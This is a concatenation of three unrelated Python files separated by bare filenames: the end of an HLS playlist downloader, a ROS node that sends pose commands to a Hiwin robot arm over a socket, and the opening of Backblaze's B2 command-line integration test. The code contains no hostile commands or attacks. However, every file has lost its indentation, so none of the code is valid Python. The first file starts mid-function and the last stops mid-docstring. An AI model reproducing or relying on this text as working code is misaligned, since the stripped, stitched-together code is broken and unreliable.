if not os.path.exists(out_dir):
try:
os.makedirs(out_dir)
except Exception as e:
logging.debug(f"Failed to make directory {out_dir}: {e}")
is_playlist, _ = is_playlist_url(url)
filename = os.path.basename(url.path)
out_path = os.path.join(out_dir, filename)
with _counter_lock:
if out_path in _fetched_dict:
logging.debug(f"Skipping {out_path} (already fetched)")
return
else:
_fetched_dict[out_path] = True
if os.path.exists(out_path) and not is_playlist:
logging.debug(f"Skipping {out_path} (already exists)")
with _counter_lock:
_bytes_total += os.path.getsize(out_path)
_files_total += 1
else:
if is_playlist:
logging.info(f"Downloading playlist to {out_path}")
else:
logging.debug(f"Downloading to {out_path}")
data = read_data_from_url(url)
if data is None:
logging.info(f"Unable to download file {url.geturl()}")
return
write_file(out_path, data)
if is_playlist:
parse_playlist(url, out_dir, data)
def fetch_threaded(url: tuple, out_dir: str) -> None:
global _threads
t = None
while True:
with _threads_lock:
if len(_threads) < _max_concurrent_downloads:
t = threading.Thread(target=fetch, args=(url, out_dir))
_threads.append(t)
t.start()
return
else:
t = _threads.pop(0)
t.join()
def fetch_uri_in_playlist(uri: str, playlist_url: tuple, playlist_out_dir: str) -> None:
uri = uri.strip().strip(b'"').decode()
url_path = urllib.parse.urlparse(uri)
if len(url_path.scheme) != 0:
logging.warning(f"Only relative URIs supported, skipping {uri}")
return
playlist_dir = os.path.dirname(playlist_url.path)
out_dir = os.path.normpath(os.path.join(playlist_out_dir, os.path.dirname(url_path.path.replace("../", ""))))
path = os.path.normpath(os.path.join(playlist_dir, url_path.path))
url_path = urllib.parse.ParseResult(
playlist_url.scheme, playlist_url.netloc, path, "", url_path.query, ""
)
if is_playlist_url(url_path)[0]:
fetch(url_path, out_dir)
else:
fetch_threaded(url_path, out_dir)
def is_playlist_url(url: tuple) -> tuple:
if len(url.path) == 0:
return False, "Empty url"
elif not (url.scheme == "http" or url.scheme == "https"):
return False, "Missing http/https scheme"
elif os.path.splitext(url.path)[1].lower() != ".m3u8":
return False, "Extension is not m3u8"
else:
return True, None
def parse_playlist(url: tuple, out_dir: str, content: str) -> None:
for line in content.splitlines():
line = line.strip()
if len(line) == 0:
continue
# tag
if line.startswith(b"#EXT"):
tag_split = line.split(b":", 1)
if len(tag_split) != 2:
continue
# attribute list
for attr in tag_split[1].split(b","):
if not attr.startswith(b"URI"):
continue
if b"BYTERANGE" in line:
break
# raise Exception(f"BYTERANGE not supported: {line}")
attr_split = attr.split(b"=", 1)
if len(attr_split) != 2:
break
fetch_uri_in_playlist(attr_split[1], url, out_dir)
break
continue
# comment
if line.startswith(b"#"):
continue
# URI
fetch_uri_in_playlist(line, url, out_dir)
def read_data_from_url(url: tuple) -> bytes:
headers = {}
if len(_auth_header) > 0:
headers["authorization"] = _auth_header
request = urllib.request.Request(url=url.geturl(), headers=headers)
for retry in range(0, 2):
try:
response = urllib.request.urlopen(request)
return response.read()
except:
if retry < 2:
continue
return None
return None
def write_file(path: str, data: bytes) -> None:
global _bytes_downloaded
global _bytes_total
global _files_downloaded
global _files_total
with open(path, "wb") as file:
file.write(data)
with _counter_lock:
_bytes_downloaded += len(data)
_bytes_total += len(data)
_files_downloaded += 1
_files_total += 1
return None
def main():
global _auth_header
global _max_concurrent_downloads
global _out_dir
parser = argparse.ArgumentParser()
parser.add_argument(
"url",
help="the HLS playlist/manifest URL, e.g. https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_ts/master.m3u8",
type=str,
)
parser.add_argument(
"-a",
"--auth",
help="set a bearer token authorization header with each HTTP request",
type=str,
)
parser.add_argument("-o", "--output", help="the output directory path", type=str)
parser.add_argument(
"-t", "--threads", help="the maximum number of concurrent downloads", type=int
)
parser.add_argument("-v", "--verbose", help="verbose logging", action="store_true")
args = parser.parse_args()
url_tuple = urllib.parse.urlparse(args.url)
if args.auth:
_auth_header = "Bearer " + args.auth
if args.threads:
_max_concurrent_downloads = args.threads
if args.output:
_out_dir = os.path.abspath(args.output)
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
level=logging.DEBUG if args.verbose else logging.INFO,
datefmt="%H:%M:%S",
)
is_playlist, message = is_playlist_url(url_tuple)
if not is_playlist:
raise Exception(f"Invalid playlist URL: {url_tuple}")
# Use the "directory" name of the playlist by default
if len(_out_dir) == 0:
dirname = os.path.basename(os.path.dirname(url_tuple.path))
_out_dir = os.path.normpath(os.path.join(os.getcwd(), dirname))
logging.info(f"Using default output directory: {_out_dir}")
fetch(url_tuple, _out_dir)
logging.info(f"Waiting for {len(_threads)} threads to finish")
while True:
thread = None
with _threads_lock:
if len(_threads) == 0:
break
else:
thread = _threads.pop(0)
logging.debug(f"{len(_threads)}")
thread.join()
logging.info(
f"Done\n {_bytes_downloaded} bytes downloaded\n {_bytes_total} bytes total\n {_files_downloaded} files downloaded\n {_files_total} files total")
os.system(f"echo {_bytes_downloaded} bytes downloaded | numfmt --to=iec-i")
os.system(f"echo {_bytes_total} bytes total | numfmt --to=iec-i")
return None
if __name__ == "__main__":
main()
|
HiwinRA605_socket_ros_test_20190625184828.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = int('%s'%req.Speedmode)
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
def socket_command():
while 1:
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
test_b2_command_line.py
|
#!/usr/bin/env python2
######################################################################
#
# File: test_b2_command_line.py
#
# Copyright 2018 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
from __future__ import print_function
import hashlib
import json
import os.path
import platform
import random
import re
import shutil
import six
import subprocess
import sys
import tempfile
import threading
import unittest
from b2sdk.utils import fix_windows_path_limit
USAGE = """
This program tests the B2 command-line client.
Usages:
{command} <accountId> <applicationKey> [basic | sync_down | sync_up | sync_up_no_prefix
keys | sync_long_path | download | account]
The optional last argument specifies which of the tests to run. If not
specified, all test will run. Runs the b2 package in the current directory.
{command} test
Runs internal unit tests.
"""
def usage_and_exit():
print(USAGE.format(command=sys.argv[0]), file=sys.stderr)
sys.exit(1)
def error_and_exit(message):
print('ERROR:', message)
sys.exit(1)
def read_file(path):
with open(path, 'rb') as f:
return f.read()
def write_file(path, contents):
with open(path, 'wb') as f:
f.write(contents)
def file_mod_time_millis(path):
return int(os.path.getmtime(path) * 1000)
def set_file_mod_time_millis(path, time):
os.utime(path, (os.path.getatime(path), time / 1000))
def random_hex(length):
return ''.join(random.choice('0123456789abcdef') for i in six.moves.xrange(length))
class TempDir(object):
def __init__(self):
self.dirpath = None
def get_dir(self):
return self.dirpath
def __enter__(self):
self.dirpath = tempfile.mkdtemp()
return self.dirpath
def __exit__(self, exc_type, exc_val, exc_tb):
shutil.rmtree(fix_windows_path_limit(self.dirpath))
class StringReader(object):
def __init__(self):
self.string = None
def get_string(self):
return self.string
def read_from(self, f):
try:
self.string = f.read()
except Exception as e:
print(e)
self.string = str(e)
def remove_insecure_platform_warnings(text):
return os.linesep.join(
line for line in text.split(os.linesep)
if ('SNIMissingWarning' not in line) and ('InsecurePlatformWarning' not in line)
)
def run_command(path_to_script, args):
"""
:param command: A list of strings like ['ls', '-l', '/dev']
:return: (status, stdout, stderr)
"""
# We'll run the b2 command-line by running the b2 module from
# the current directory. Python 2.6 doesn't support using
# '-m' with a package, so we explicitly say to run the module
# b2.__main__
os.environ['PYTHONPATH'] = '.'
os.environ['PYTHONIOENCODING'] = 'utf-8'
command = ['python', '-m', 'b2.__main__']
command.extend(args)
print('Running:', ' '.join(command))
stdout = StringReader()
stderr = StringReader()
p = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=platform.system() != 'Windows'
)
p.stdin.close()
reader1 = threading.Thread(target=stdout.read_from, args=[p.stdout])
reader1.start()
reader2 = threading.Thread(target=stderr.read_from, args=[p.stderr])
reader2.start()
p.wait()
reader1.join()
reader2.join()
stdout_decoded = remove_insecure_platform_warnings(stdout.get_string().decode('utf-8'))
stderr_decoded = remove_insecure_platform_warnings(stderr.get_string().decode('utf-8'))
print_output(p.returncode, stdout_decoded, stderr_decoded)
return p.returncode, stdout_decoded, stderr_decoded
def print_text_indented(text):
"""
Prints text that may include weird characters, indented four spaces.
"""
for line in text.split(os.linesep):
print(' ', repr(line)[1:-1])
def print_json_indented(value):
"""
Converts the value to JSON, then prints it.
"""
print_text_indented(json.dumps(value, indent=4, sort_keys=True))
def print_output(status, stdout, stderr):
print(' status:', status)
if stdout != '':
print(' stdout:')
print_text_indented(stdout)
if stderr != '':
print(' stderr:')
print_text_indented(stderr)
print()
class CommandLine(object):
PROGRESS_BAR_PATTERN = re.compile(r'.*B/s]$', re.DOTALL)
EXPECTED_STDERR_PATTERNS = [
PROGRESS_BAR_PATTERN,
re.compile(r'^$') # empty line
]
def __init__(self, path_to_script):
self.path_to_script = path_to_script
def run_command(self, args):
"""
Runs the command with the given arguments, returns a tuple in form of
(succeeded, stdout)
"""
status, stdout, stderr = run_command(self.path_to_script, args)
return status == 0 and stderr == '', stdout
def should_succeed(self, args, expected_pattern=None):
"""
Runs the command-line with the given arguments. Raises an exception
if there was an error; otherwise, returns the stdout of the command
as as string.
"""
status, stdout, stderr = run_command(self.path_to_script, args)
if status != 0:
print('FAILED with status', status)
sys.exit(1)
if stderr != '':
failed = False
for line in (s.strip() for s in stderr.split(os.linesep)):
if not any(p.match(line) for p in self.EXPECTED_STDERR_PATTERNS):
print('Unexpected stderr line:', repr(line))
failed = True
if failed:
print('FAILED because of stderr')
print(stderr)
sys.exit(1)
if expected_pattern is not None:
if re.search(expected_pattern, stdout) is None:
print('STDOUT:')
print(stdout)
error_and_exit('did not match pattern: ' + expected_pattern)
return stdout
def should_succeed_json(self, args):
"""
Runs the command-line with the given arguments. Raises an exception
if there was an error; otherwise, treats the stdout as JSON and returns
the data in it.
"""
return json.loads(self.should_succeed(args))
def should_fail(self, args, expected_pattern):
"""
Runs the command-line with the given args, expecting the given pattern
to appear in stderr.
"""
status, stdout, stderr = run_command(self.path_to_script, args)
if status == 0:
print('ERROR: should have failed')
sys.exit(1)
if re.search(expected_pattern, stdout + stderr) is None:
print(expected_pattern)
print(stdout + stderr)
error_and_exit('did not match pattern: ' + expected_pattern)
def list_file_versions(self, bucket_name):
return self.should_succeed_json(['list_file_versions', bucket_name])['files']
class TestCommandLine(unittest.TestCase):
def test_stderr_patterns(self):
progress_bar_line = './b2: 0%| | 0.00/33.3K [00:00<?, ?B/s]\r./b2: 25%|\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8d | 8.19K/33.3K [00:00<00:01, 21.7KB/s]\r./b2: 33.3KB [00:02, 12.1KB/s]'
self.assertIsNotNone(CommandLine.PROGRESS_BAR_PATTERN.match(progress_bar_line))
progress_bar_line = '\r./b2: 0%| | 0.00/33.3K [00:00<?, ?B/s]\r./b2: 25%|\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8d | 8.19K/33.3K [00:00<00:01, 19.6KB/s]\r./b2: 33.3KB [00:02, 14.0KB/s]'
self.assertIsNotNone(CommandLine.PROGRESS_BAR_PATTERN.match(progress_bar_line))
def should_equal(expected, actual):
print(' expected:')
print_json_indented(expected)
print(' actual:')
print_json_indented(actual)
if expected != actual:
print(' ERROR')
sys.exit(1)
print()
def delete_files_in_bucket(b2_tool, bucket_name):
while True:
data = b2_tool.should_succeed_json(['list_file_versions', bucket_name])
files = data['files']
if len(files) == 0:
return
for file_info in files:
b2_tool.should_succeed(
['delete_file_version', file_info['fileName'], file_info['fileId']]
)
def clean_buckets(b2_tool, bucket_name_prefix):
"""
Removes the named bucket, if it's there.
In doing so, exercises list_buckets.
"""
text = b2_tool.should_succeed(['list_buckets'])
buckets = {}
for line in text.split(os.linesep)[:-1]:
words = line.split()
if len(words) != 3:
error_and_exit('bad list_buckets line: ' + line)
(b_id, b_type, b_name) = words
buckets[b_name] = b_id
for bucket_name in buckets:
if bucket_name.startswith(bucket_name_prefix):
delete_files_in_bucket(b2_tool, bucket_name)
b2_tool.should_succeed(['delete_bucket', bucket_name])
def setup_envvar_test(envvar_name, envvar_value):
"""
Establish config for environment variable test.
The envvar_value names the new credential file
Create an environment variable with the given value
Copy the B2 credential file (~/.b2_account_info) and rename the existing copy
Extract and return the account_id and application_key from the credential file
"""
src = os.path.expanduser('~/.b2_account_info')
dst = os.path.expanduser(envvar_value)
shutil.copyfile(src, dst)
shutil.move(src, src + '.bkup')
os.environ[envvar_name] = envvar_value
def tearDown_envvar_test(envvar_name):
"""
Clean up after running the environment variable test.
Delete the new B2 credential file (file contained in the
envvar_name environment variable.
Rename the backup of the original credential file back to
the standard name (~/.b2_account_info)
Delete the environment variable
"""
os.remove(os.environ.get(envvar_name))
fname = os.path.expanduser('~/.b2_account_info')
shutil.move(fname + '.bkup', fname)
if os.environ.get(envvar_name) is not None:
del os.environ[envvar_name]
def download_test(b2_tool, bucket_name):
file_to_upload = 'README.md'
uploaded_a = b2_tool.should_succeed_json(
['upload_file', '--noProgress', '--quiet', bucket_name, file_to_upload, 'a']
)
with TempDir() as dir_path:
p = lambda fname: os.path.join(dir_path, fname)
b2_tool.should_succeed(['download_file_by_name', '--noProgress', bucket_name, 'a', p('a')])
assert read_file(p('a')) == read_file(file_to_upload)
b2_tool.should_succeed(
['download_file_by_id', '--noProgress', uploaded_a['fileId'],
p('b')]
)
assert read_file(p('b')) == read_file(file_to_upload)
# there is just one file, so clean after itself for faster execution
b2_tool.should_succeed(['delete_file_version', uploaded_a['fileName'], uploaded_a['fileId']])
b2_tool.should_succeed(['delete_bucket', bucket_name])
return True
def basic_test(b2_tool, bucket_name):
file_to_upload = 'README.md'
file_mod_time_str = str(file_mod_time_millis(file_to_upload))
hex_sha1 = hashlib.sha1(read_file(file_to_upload)).hexdigest()
b2_tool.should_succeed(
['upload_file', '--noProgress', '--quiet', bucket_name, file_to_upload, 'a']
)
b2_tool.should_succeed(['upload_file', '--noProgress', bucket_name, file_to_upload, 'a'])
b2_tool.should_succeed(['upload_file', '--noProgress', bucket_name, file_to_upload, 'b/1'])
b2_tool.should_succeed(['upload_file', '--noProgress', bucket_name, file_to_upload, 'b/2'])
b2_tool.should_succeed(
[
'upload_file', '--noProgress', '--sha1', hex_sha1, '--info', 'foo=bar=baz', '--info',
'color=blue', bucket_name, file_to_upload, 'c'
]
)
b2_tool.should_fail(
[
'upload_file', '--noProgress', '--sha1', hex_sha1, '--info', 'foo-bar', '--info',
'color=blue', bucket_name, file_to_upload, 'c'
], r'ERROR: Bad file info: foo-bar'
)
b2_tool.should_succeed(
[
'upload_file', '--noProgress', '--contentType', 'text/plain', bucket_name,
file_to_upload, 'd'
]
)
b2_tool.should_succeed(
['download_file_by_name', '--noProgress', bucket_name, 'b/1', os.devnull]
)
b2_tool.should_succeed(['hide_file', bucket_name, 'c'])
list_of_files = b2_tool.should_succeed_json(['list_file_names', bucket_name])
should_equal(['a', 'b/1', 'b/2', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(['list_file_names', bucket_name, 'b/2'])
should_equal(['b/2', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(['list_file_names', bucket_name, 'b', '2'])
should_equal(['b/1', 'b/2'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(['list_file_versions', bucket_name])
should_equal(
['a', 'a', 'b/1', 'b/2', 'c', 'c', 'd'], [f['fileName'] for f in list_of_files['files']]
)
should_equal(
['upload', 'upload', 'upload', 'upload', 'hide', 'upload', 'upload'],
[f['action'] for f in list_of_files['files']]
)
first_c_version = list_of_files['files'][4]
second_c_version = list_of_files['files'][5]
list_of_files = b2_tool.should_succeed_json(['list_file_versions', bucket_name, 'c'])
should_equal(['c', 'c', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(
['list_file_versions', bucket_name, 'c', second_c_version['fileId']]
)
should_equal(['c', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(
['list_file_versions', bucket_name, 'c', second_c_version['fileId'], '1']
)
should_equal(['c'], [f['fileName'] for f in list_of_files['files']])
b2_tool.should_succeed(['ls', bucket_name], '^a{0}b/{0}d{0}'.format(os.linesep))
b2_tool.should_succeed(
['ls', '--long', bucket_name],
'^4_z.*upload.*a{0}.*-.*b/{0}4_z.*upload.*d{0}'.format(os.linesep)
)
b2_tool.should_succeed(
['ls', '--versions', bucket_name], '^a{0}a{0}b/{0}c{0}c{0}d{0}'.format(os.linesep)
)
b2_tool.should_succeed(['ls', bucket_name, 'b'], '^b/1{0}b/2{0}'.format(os.linesep))
b2_tool.should_succeed(['ls', bucket_name, 'b/'], '^b/1{0}b/2{0}'.format(os.linesep))
file_info = b2_tool.should_succeed_json(['get_file_info', second_c_version['fileId']])
expected_info = {
'color': 'blue',
'foo': 'bar=baz',
'src_last_modified_millis': file_mod_time_str
}
should_equal(expected_info, file_info['fileInfo'])
b2_tool.should_succeed(['delete_file_version', 'c', first_c_version['fileId']])
b2_tool.should_succeed(['ls', bucket_name], '^a{0}b/{0}c{0}d{0}'.format(os.linesep))
b2_tool.should_succeed(['make_url', second_c_version['fileId']])
def key_restrictions_test(b2_tool, bucket_name):
second_bucket_name = 'test-b2-command-line-' + random_hex(8)
b2_tool.should_succeed(['create-bucket', second_bucket_name, 'allPublic'],)
key_one_name = 'clt-testKey-01' + random_hex(6)
created_key_stdout = b2_tool.should_succeed(
[
'create-key',
key_one_name,
'listFiles,listBuckets,readFiles,writeKeys',
]
)
key_one_id, key_one = created_key_stdout.split()
b2_tool.should_succeed(['authorize_account', key_one_id, key_one],)
b2_tool.should_succeed(['get-bucket', bucket_name],)
b2_tool.should_succeed(['get-bucket', second_bucket_name],)
key_two_name = 'clt-testKey-02' + random_hex(6)
created_key_two_stdout = b2_tool.should_succeed(
[
'create-key',
'--bucket',
bucket_name,
key_two_name,
'listFiles,listBuckets,readFiles',
]
)
key_two_id, key_two = created_key_two_stdout.split()
b2_tool.should_succeed(['authorize_account', key_two_id, key_two],)
b2_tool.should_succeed(['get-bucket', bucket_name],)
b2_tool.should_succeed(['list-file-names', bucket_name],)
failed_bucket_err = r'ERROR: Application key is restricted to bucket: ' + bucket_name
b2_tool.should_fail(['get-bucket', second_bucket_name], failed_bucket_err)
failed_list_files_err = r'ERROR: Application key is restricted to bucket: ' + bucket_name
b2_tool.should_fail(['list-file-names', second_bucket_name], failed_list_files_err)
# reauthorize with more capabilities for clean up
b2_tool.should_succeed(['authorize_account', sys.argv[1], sys.argv[2]])
b2_tool.should_succeed(['delete-bucket', second_bucket_name])
b2_tool.should_succeed(['delete-key', key_one_id])
b2_tool.should_succeed(['delete-key', key_two_id])
def account_test(b2_tool, bucket_name):
# actually a high level operations test - we run bucket tests here since this test doesn't use it
b2_tool.should_succeed(['delete_bucket', bucket_name])
new_bucket_name = bucket_name[:-8] + random_hex(
8
) # apparently server behaves erratically when we delete a bucket and recreate it right away
b2_tool.should_succeed(['create_bucket', new_bucket_name, 'allPrivate'])
b2_tool.should_succeed(['update_bucket', new_bucket_name, 'allPublic'])
new_creds = os.path.join(tempfile.gettempdir(), 'b2_account_info')
setup_envvar_test('B2_ACCOUNT_INFO', new_creds)
b2_tool.should_succeed(['clear_account'])
bad_application_key = sys.argv[2][:-8] + ''.join(reversed(sys.argv[2][-8:]))
b2_tool.should_fail(['authorize_account', sys.argv[1], bad_application_key], r'unauthorized')
b2_tool.should_succeed(['authorize_account', sys.argv[1], sys.argv[2]])
tearDown_envvar_test('B2_ACCOUNT_INFO')
def file_version_summary(list_of_files):
"""
Given the result of list_file_versions, returns a list
